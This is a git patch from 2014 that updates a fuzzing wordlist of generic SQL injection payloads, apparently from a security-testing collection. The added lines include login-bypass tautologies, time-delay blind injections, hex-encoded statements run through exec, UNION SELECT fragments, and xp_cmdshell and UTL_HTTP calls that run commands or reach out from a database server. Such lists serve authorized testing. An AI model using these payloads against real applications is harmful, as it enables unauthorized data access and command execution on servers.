From 2eaeada47162c2a98fc00cbdbfcd66a8c7a44d62 Mon Sep 17 00:00:00 2001
From: Jason Haddix <j.haddix56@gmail.com>
Date: Wed, 23 Jul 2014 03:48:38 -0700
Subject: [PATCH] Update Generic_SQLi

---
 Fuzzing/Generic_SQLi | 57 +++++++++++++++++++++++++++++++++++++++++---
 1 file changed, 54 insertions(+), 3 deletions(-)

diff --git a/Fuzzing/Generic_SQLi b/Fuzzing/Generic_SQLi
index 7852ed21..4a30a2e1 100644
--- a/Fuzzing/Generic_SQLi
+++ b/Fuzzing/Generic_SQLi
@@ -49,7 +49,6 @@ a' waitfor delay '0:0:10'--
 1;(load_file(char(47,101,116,99,47,112,97,115, ...
 or%201=1
 1 or sleep(__TIME__)#
-));waitfor delay '0:0:__TIME__'--
 or 1=1
  and 1 in (select var from temp)--
  or '7659'='7659
@@ -186,11 +185,9 @@ or 0=0 #
 hi or a=a
 *(|(mail=*))
 password:*/=1--
- or 1=1--
 distinct
 );waitfor delay '0:0:__TIME__'--
 to_timestamp_tz
-;waitfor delay '0:0:__TIME__'--
 ") or benchmark(10000000,MD5(1))#
  UNION SELECT
 %2A%28%7C%28mail%3D%2A%29%29
@@ -214,3 +211,57 @@ x' or 1=1 or 'x'='y
 ?
  or 1/*
 !
+'
+ or a = a
+declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
+declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 
+declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
+declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
+' or 1=1
+ or 1=1 --
+x' OR full_name LIKE '%Bob%
+'; exec master..xp_cmdshell 'ping 172.10.1.255'--
+'%20or%20''='
+'%20or%20'x'='x
+')%20or%20('x'='x
+' or 0=0 --
+' or 0=0 #
+ or 0=0 #"
+' or 1=1--
+' or '1'='1'--
+' or 1 --'
+or 1=1--
+' or 1=1 or ''='
+ or 1=1 or ""=
+' or a=a--
+ or a=a
+') or ('a'='a
+'hi' or 'x'='x';
+or
+procedure
+handler
+' or username like '%
+' or uname like '%
+' or userid like '%
+' or uid like '%
+' or user like '%
+'; exec master..xp_cmdshell
+'; exec xp_regread
+t'exec master..xp_cmdshell 'nslookup www.google.com'--
+--sp_password
+' UNION SELECT
+' UNION ALL SELECT
+' or (EXISTS)
+' (select top 1
+'||UTL_HTTP.REQUEST
+1;SELECT%20*
+<>"'%;)(&+
+'%20or%201=1
+'sqlattempt1
+%28
+%29
+%26
+%21
+' or ''='
+' or 3=3
+ or 3=3 --